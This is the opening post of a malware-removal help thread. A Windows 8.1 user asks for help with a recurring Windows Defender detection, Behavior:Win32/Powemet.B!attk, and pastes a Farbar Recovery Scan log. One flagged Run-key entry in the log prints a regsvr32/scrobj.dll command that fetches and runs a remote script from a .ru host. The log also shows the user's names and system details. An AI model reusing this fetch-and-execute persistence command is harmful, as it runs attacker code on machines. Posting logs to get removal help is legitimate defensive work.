
Infected with Behavior:Win32/Powemet.B!attk


5 replies to this topic

#1 Gaya19
  • Members
  • 3 posts

Posted 18 August 2017 - 08:37 PM

Hi. My laptop is running Windows 8.1. After I inserted a USB thumb drive, Windows Defender detected Behavior:Win32/Powemet.B!attk. Windows Defender quarantines the infected files and I then delete them; however, every time I start the computer, the same virus is detected again by Windows Defender.

 

An example message in Windows Defender:  

Category: Suspicious Behavior
Description: This program is dangerous and executes commands from an attacker.
Recommended action: Remove this software immediately.
Items: 
behavior:pid:3340:94227975697806
process:pid:3340,ProcessStart:131475718717781479

 

I have tried using Malwarebytes, but it didn't seem to detect this Behavior:Win32/Powemet.B!attk. I tried installing Avast, Bitdefender and Kaspersky, but it seems they could not be installed properly (I don't know why). I'm at my wit's end so thanks so much in advance for your help.


Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 18-08-2017
Ran by Ligaya (administrator) on DELL (19-08-2017 09:20:43)
Running from C:\Users\Ligaya\Desktop
Loaded Profiles: UpdatusUser & Ligaya (Available Profiles: UpdatusUser & Ligaya)
Platform: Windows 8.1 Single Language (Update) (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Safe Mode (with Networking)
 
==================== Processes (Whitelisted) =================
 
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
 
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCui.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpUXSrv.exe
 
==================== Registry (Whitelisted) ====================
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
 
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6846096 2012-11-20] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1253520 2012-11-20] (Realtek Semiconductor)
HKLM\...\Run: [HotKeysCmds] => C:\Windows\system32\hkcmd.exe
HKLM\...\Run: [Persistence] => C:\Windows\system32\igfxpers.exe
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [3759504 2012-09-13] (Dell Inc.)
HKLM\...\Run: [BTMTrayAgent] => rundll32.exe "C:\Program Files (x86)\Intel\Bluetooth\btmshellex.dll",TrayApp
HKLM\...\Run: [IntelTBRunOnce] => wscript.exe //b //nologo "C:\Program Files\Intel\TurboBoost\RunTBGadgetOnce.vbs"
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2917688 2012-09-08] (Synaptics Incorporated)
HKLM\...\Run: [DellWPF] => C:\Program Files\Synaptics\SynTP\DellTouchpad.exe [4875576 2012-09-08] ()
HKLM\...\Run: [WindowsDefender] => "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
HKLM-x32\...\Run: [IAStorIcon] => C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [277504 2012-07-10] (Intel Corporation)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [91520 2010-01-21] (Microsoft Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [60712 2014-10-11] (Apple Inc.)
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [Adobe Acrobat Speed Launcher] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrobat_sl.exe [41360 2015-09-24] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [Acrobat Assistant 8.0] => C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Acrotray.exe [840592 2015-09-24] (Adobe Systems Inc.)
HKLM-x32\...\Run: [EEventManager] => C:\Program Files (x86)\Epson Software\Event Manager\EEventManager.exe [1058912 2012-04-02] (SEIKO EPSON CORPORATION)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [157480 2014-10-15] (Apple Inc.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [4513792 2014-05-22] (Brother Industries, Ltd.)
HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0
HKLM\...\Policies\Explorer: [HideSCAHealth] 0
HKU\S-1-5-21-1090255531-1958037965-2896169239-1001\...\RunOnce: [WAB Migrate] => C:\Program Files\Windows Mail\wab.exe [516608 2014-10-29] (Microsoft Corporation)
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Run: [Google Update] => C:\Users\Gaya\AppData\Local\Google\Update\GoogleUpdate.exe [116648 2013-11-13] (Google Inc.)
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Run: [Skype] => "C:\Program Files (x86)\Skype\Phone\Skype.exe" /minimized /regrun
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\RunOnce: [Adobe Speed Launcher] => 1418274198
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Run: [Google Update] => C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.5\GoogleUpdateCore.exe [601168 2017-04-29] (Google Inc.)
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Run: [Google Photos Backup] => C:\Users\Ligaya\AppData\Local\Programs\Google\Google Photos Backup\Google Photos Backup.exe [3790936 2016-04-09] (Google, Inc)
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Run: [Dropbox Update] => C:\Users\Ligaya\AppData\Local\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-05] (Dropbox, Inc.)
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.aserdefa.ru/restore.xml scrobj.dll <==== ATTENTION
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\MountPoints2: {426410b4-8269-11e4-819a-606c66264890} - "E:\Setup.exe" /s
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\MountPoints2: {42641449-8269-11e4-819a-606c66264890} - "E:\Setup.exe" /s
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\MountPoints2: {48bbcfac-83c0-11e5-81c6-606c66264890} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\MountPoints2: {608524fd-0114-11e5-81b9-606c66264890} - "E:\AutoRun.exe" 
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\...\MountPoints2: {ad1936dc-7b47-11e4-8190-7845c4c1808f} - "E:\Setup.exe" /s
AppInit_DLLs: C:\Windows\system32\nvinitx.dll => C:\Windows\system32\nvinitx.dll [168616 2013-12-18] (NVIDIA Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ImageBrowser EX Agent.lnk [2014-11-10]
ShortcutTarget: ImageBrowser EX Agent.lnk -> C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe ()
Startup: C:\Users\Gaya\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2014-11-15]
ShortcutTarget: Dropbox.lnk -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
Startup: C:\Users\Ligaya\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk [2017-08-13]
ShortcutTarget: Dropbox.lnk -> C:\Users\Ligaya\AppData\Roaming\Dropbox\bin\Dropbox.exe (Dropbox, Inc.)
 
==================== Internet (Whitelisted) ====================
 
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
 
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{E25DAE67-1539-483B-93E5-AF4722F3917E}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{FAD7ED5C-CCBA-4E06-A052-C84A718F1B8F}: [DhcpNameServer] 172.8.1.1
 
Internet Explorer:
==================
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://dell13.msn.com
HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell13.msn.com
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://dell13.msn.com
HKU\S-1-5-21-1090255531-1958037965-2896169239-1004\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell13.msn.com
URLSearchHook: [S-1-5-21-1090255531-1958037965-2896169239-1001] ATTENTION => Default URLSearchHook is missing
SearchScopes: HKU\.DEFAULT -> DefaultScope {5D615BAB-5403-4175-95E6-5392C2A3D2F0} URL = 
SearchScopes: HKU\.DEFAULT -> {5D615BAB-5403-4175-95E6-5392C2A3D2F0} URL = 
SearchScopes: HKU\S-1-5-21-1090255531-1958037965-2896169239-1002 -> DefaultScope {5D615BAB-5403-4175-95E6-5392C2A3D2F0} URL = 
SearchScopes: HKU\S-1-5-21-1090255531-1958037965-2896169239-1002 -> {5D615BAB-5403-4175-95E6-5392C2A3D2F0} URL = 
SearchScopes: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004 -> DefaultScope {5D615BAB-5403-4175-95E6-5392C2A3D2F0} URL = 
SearchScopes: HKU\S-1-5-21-1090255531-1958037965-2896169239-1004 -> {5D615BAB-5403-4175-95E6-5392C2A3D2F0} URL = 
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2010-01-21] (Microsoft Corporation)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2010-01-16] (Microsoft Corporation)
BHO-x32: Adobe PDF Link Helper -> {18DF081C-E8AD-4283-A596-FA578C2EBDC3} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll [2012-09-23] (Adobe Systems Incorporated)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2010-01-21] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\ssv.dll [2015-01-24] (Oracle Corporation)
BHO-x32: Adobe PDF Conversion Toolbar Helper -> {AE7CD045-E861-484f-8273-0445EE161910} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2010-01-16] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\jp2ssv.dll [2015-01-24] (Oracle Corporation)
BHO-x32: SmartSelect Class -> {F4971EE7-DAA0-4053-9964-665D8EE6A077} -> C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)
Toolbar: HKLM-x32 - Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files (x86)\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll [2015-09-24] (Adobe Systems Incorporated)
Toolbar: HKU\.DEFAULT -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Toolbar: HKU\S-1-5-21-1090255531-1958037965-2896169239-1002 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
Handler: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} -  No File
 
FireFox:
========
FF ProfilePath: C:\Users\Ligaya\AppData\Roaming\Mozilla\Firefox\Profiles\qadwysdp.default-1454852340919 [2017-08-18]
FF Homepage: Mozilla\Firefox\Profiles\qadwysdp.default-1454852340919 -> hxxp://smalltowngirlsmidnighttrains.com/
FF Extension: (Click-to-Play staged rollout) - C:\Program Files (x86)\Mozilla Firefox\browser\features\clicktoplay-rollout@mozilla.org.xpi [2017-07-10] [not signed]
FF Extension: (Follow-on Search Telemetry) - C:\Program Files (x86)\Mozilla Firefox\browser\features\followonsearch@mozilla.com.xpi [2017-07-01] [not signed]
FF Extension: (Shield Recipe Client) - C:\Program Files (x86)\Mozilla Firefox\browser\features\shield-recipe-client@mozilla.org.xpi [2017-08-01] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [web2pdfextension@web2pdf.adobedotcom] - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn
FF Extension: (Adobe Acrobat - Create PDF) - C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Browser\WCFirefoxExtn [2015-10-18] [not signed]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK => not found
FF HKU\S-1-5-21-1090255531-1958037965-2896169239-1002\...\Firefox\Extensions: [{e4f94d1e-2f53-401e-8885-681602c0ddd8}] - C:\ProgramData\McAfee Security Scan\Extensions\{e4f94d1e-2f53-401e-8885-681602c0ddd8}.xpi => not found
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_26_0_0_151.dll [2017-08-09] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_26_0_0_151.dll [2017-08-09] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2014-02-18] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\dtplugin\npDeployJava1.dll [2015-01-24] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.31.2 -> C:\Program Files (x86)\Java\jre1.8.0_31\bin\plugin2\npjp2.dll [2015-01-24] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.50907.0\npctrl.dll [2017-05-03] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~2\Office14\NPSPWRAP.DLL [2010-01-10] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-13] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-30] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-30] (Google Inc.)
FF Plugin-x32: @videolan.org/vlc,version=2.0.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2012-03-17] (VideoLAN)
FF Plugin-x32: Adobe Acrobat -> C:\Program Files (x86)\Adobe\Acrobat 10.0\Acrobat\Air\nppdf32.dll [2015-09-24] (Adobe Systems Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2017-08-01] (Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1090255531-1958037965-2896169239-1002: @citrixonline.com/appdetectorplugin -> C:\Users\Gaya\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2013-09-03] (Citrix Online)
FF Plugin HKU\S-1-5-21-1090255531-1958037965-2896169239-1002: @tools.google.com/Google Update;version=3 -> C:\Users\Gaya\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll [2014-11-13] (Google Inc.)
FF Plugin HKU\S-1-5-21-1090255531-1958037965-2896169239-1002: @tools.google.com/Google Update;version=9 -> C:\Users\Gaya\AppData\Local\Google\Update\1.3.25.11\npGoogleUpdate3.dll [2014-11-13] (Google Inc.)
FF Plugin HKU\S-1-5-21-1090255531-1958037965-2896169239-1004: @citrixonline.com/appdetectorplugin -> C:\Users\Ligaya\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2017-05-17] (Citrix Online)
FF Plugin HKU\S-1-5-21-1090255531-1958037965-2896169239-1004: @tools.google.com/Google Update;version=3 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
FF Plugin HKU\S-1-5-21-1090255531-1958037965-2896169239-1004: @tools.google.com/Google Update;version=9 -> C:\Users\Ligaya\AppData\Local\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-29] (Google Inc.)
 
Chrome: 
=======
CHR DefaultProfile: Default
CHR HomePage: Default -> hxxp://www.google.com/
CHR StartupUrls: Default -> "hxxp://www.google.com/"
CHR Profile: C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default [2017-08-19]
CHR Extension: (Google Slides) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2015-02-05]
CHR Extension: (Google Docs) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2015-02-05]
CHR Extension: (Google Drive) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2015-10-22]
CHR Extension: (YouTube) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2015-09-26]
CHR Extension: (Google Search) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2015-10-31]
CHR Extension: (Google Sheets) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2015-02-05]
CHR Extension: (Google Docs Offline) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-03-15]
CHR Extension: (Skype) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\lifbcibllhkdhoafpjfnlhfpfgnpldfl [2017-07-31]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-03-09]
CHR Extension: (Gmail) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2015-03-31]
CHR Extension: (Chrome Media Router) - C:\Users\Ligaya\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-08-09]
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - C:\Program Files (x86)\Skype\Toolbars\ChromeExtension\skype_chrome_extension.crx [2014-07-14]
 
==================== Services (Whitelisted) ====================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 BrYNSvc; C:\Program Files (x86)\Browny02\BrYNSvc.exe [282112 2013-09-25] (Brother Industries, Ltd.) [File not signed]
S2 DellDigitalDelivery; c:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe [173056 2012-06-20] (Dell Products, LP.) [File not signed]
S2 EpsonScanSvc; C:\Windows\system32\EscSvc64.exe [135824 2011-12-12] (Seiko Epson Corporation)
S3 IAStorDataMgrSvc; C:\Program Files (x86)\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe [7168 2012-07-10] (Intel Corporation) [File not signed]
S2 IconMan_R; C:\Program Files (x86)\Realtek\Realtek USB 2.0 Card Reader\RIconMan.exe [2464400 2012-09-08] (Realsil Microelectronics Inc.)
S2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [319376 2014-10-01] (Intel Corporation)
S2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [166720 2012-06-26] (Intel Corporation)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273136 2013-08-28] ()
S2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [201872 2012-11-21] (Realtek Semiconductor)
S2 SftService; C:\Program Files (x86)\Dell Backup and Recovery\sftservice.exe [1915480 2013-05-23] (SoftThinks SAS)
S2 Speed Wi-Fi Next setting tool; C:\ProgramData\MobileBrServ\mbbservice.exe [242256 2014-08-20] ()
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-01-13] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-01-13] (Microsoft Corporation)
S3 wmiApSrv; C:\WINDOWS\system32\wbem\WmiApSrv.exe [201728 2014-10-29] (Microsoft Corporation)
S2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3378416 2013-08-28] (Intel® Corporation)
 
===================== Drivers (Whitelisted) ======================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 androidusb; C:\WINDOWS\System32\Drivers\androidusb.sys [32768 2010-04-29] (Google Inc)
S3 btmhsf; C:\WINDOWS\system32\DRIVERS\btmhsf.sys [857472 2012-08-29] (Motorola Solutions, Inc.)
S3 DellRbtn; C:\WINDOWS\System32\drivers\DellRbtn.sys [10752 2013-01-25] (OSR Open Systems Resources, Inc.)
S3 dg_ssudbus; C:\WINDOWS\system32\DRIVERS\ssudbus.sys [131712 2016-09-05] (Samsung Electronics Co., Ltd.)
R3 NETwNe64; C:\WINDOWS\system32\DRIVERS\Netwew00.sys [3345376 2013-10-08] (Intel Corporation)
R0 rtcrfilt64; C:\WINDOWS\System32\DRIVERS\rtcrfilt64.sys [19600 2012-09-05] (Realtek Semiconductor Corp.)
S3 SmbDrv; C:\WINDOWS\System32\drivers\Smb_driver_AMDASF.sys [41272 2012-09-08] (Synaptics Incorporated)
R3 SmbDrvI; C:\WINDOWS\system32\DRIVERS\Smb_driver_Intel.sys [43832 2012-09-08] (Synaptics Incorporated)
S3 ssudmdm; C:\WINDOWS\system32\DRIVERS\ssudmdm.sys [165504 2016-09-05] (Samsung Electronics Co., Ltd.)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [46600 2017-02-10] (Microsoft Corporation)
S0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [274776 2017-01-13] (Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [117592 2017-01-13] (Microsoft Corporation)
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One Month Created files and folders ========
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2017-08-19 09:20 - 2017-08-19 09:23 - 000021768 _____ C:\Users\Ligaya\Desktop\FRST.txt
2017-08-19 09:20 - 2017-08-19 09:20 - 000000000 ____D C:\FRST
2017-08-19 09:17 - 2017-08-19 09:18 - 002395648 _____ (Farbar) C:\Users\Ligaya\Desktop\FRST64.exe
2017-08-19 08:28 - 2017-08-19 08:28 - 000030126 _____ C:\ProgramData\agent.uninstall.1503102514.bdinstall.bin
2017-08-19 08:13 - 2017-08-19 08:27 - 000000000 ____D C:\ProgramData\Kaspersky Lab Setup Files
2017-08-19 08:10 - 2017-08-19 08:10 - 000000000 ____D C:\Users\Ligaya\AppData\Roaming\AVAST Software
2017-08-19 08:08 - 2017-08-19 08:09 - 001015880 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw a652a81917d0422.tmp
2017-08-19 08:08 - 2017-08-19 08:09 - 000146704 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw1cb1615eba2846d5.tmp
2017-08-19 08:08 - 2017-08-19 08:09 - 000146696 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswmonflt.sys.150310135598407
2017-08-19 08:08 - 2017-08-19 08:08 - 001015848 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswsnx.sys.150310135598407
2017-08-19 08:08 - 2017-08-19 08:08 - 000585608 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswfc7583a9dafd91dd.tmp
2017-08-19 08:08 - 2017-08-19 08:08 - 000361336 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw4dd7a693a41e45e8.tmp
2017-08-19 08:08 - 2017-08-19 08:08 - 000198768 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswb9e193d30d200064.tmp
2017-08-19 08:08 - 2017-08-19 08:08 - 000146664 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswmonflt.sys.150310134637503
2017-08-19 08:08 - 2017-08-19 08:08 - 000110352 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\asw7c3edf2a75a39cdb.tmp
2017-08-19 08:08 - 2017-08-19 08:08 - 000084392 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswefb010485c2b177f.tmp
2017-08-19 08:08 - 2017-08-19 08:08 - 000046984 _____ (AVAST Software) C:\WINDOWS\system32\Drivers\aswa8fc28cb1a5f5122.tmp
2017-08-19 08:08 - 2017-08-19 08:07 - 000343288 _____ (AVAST Software s.r.o.) C:\WINDOWS\system32\Drivers\asw91cd079f13a20317.tmp
2017-08-19 08:08 - 2017-08-19 08:07 - 000320008 _____ (AVAST Software s.r.o.) C:\WINDOWS\system32\Drivers\asw71b19f1bd55db8d1.tmp
2017-08-19 08:08 - 2017-08-19 08:07 - 000198976 _____ (AVAST Software s.r.o.) C:\WINDOWS\system32\Drivers\aswefc4a74d8a6e9c9b.tmp
2017-08-19 08:08 - 2017-08-19 08:07 - 000057728 _____ (AVAST Software s.r.o.) C:\WINDOWS\system32\Drivers\asw35bd0693721b3e07.tmp
2017-08-19 07:57 - 2017-08-19 07:57 - 000000000 ____D C:\Program Files\AVAST Software
2017-08-19 07:55 - 2017-08-19 08:08 - 000000000 ____D C:\ProgramData\AVAST Software
2017-08-19 07:51 - 2017-08-19 07:51 - 000030578 _____ C:\ProgramData\agent.update.1503100260.bdinstall.bin
2017-08-19 07:49 - 2017-08-19 08:28 - 000000000 ____D C:\Program Files\Bitdefender Agent
2017-08-19 07:49 - 2017-08-19 07:49 - 000048706 _____ C:\ProgramData\agent.1503100178.bdinstall.bin
2017-08-19 07:49 - 2017-08-19 07:49 - 000000000 ____D C:\ProgramData\Bitdefender Agent
2017-08-18 21:45 - 2017-08-19 07:21 - 000427372 _____ C:\WINDOWS\ntbtlog.txt
2017-08-18 12:22 - 2017-08-18 12:22 - 000180711 _____ C:\Users\Ligaya\Desktop\LIGAYA SABERON (August 20-21, 2017).pdf
2017-08-13 09:30 - 2017-08-13 09:30 - 000000000 ____D C:\Users\Ligaya\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Dropbox
2017-08-09 13:24 - 2017-07-21 21:40 - 000518144 _____ C:\WINDOWS\SysWOW64\msjetoledb40.dll
2017-08-09 13:24 - 2017-07-21 21:40 - 000290816 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjtes40.dll
2017-08-09 13:24 - 2017-07-14 14:49 - 025733632 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
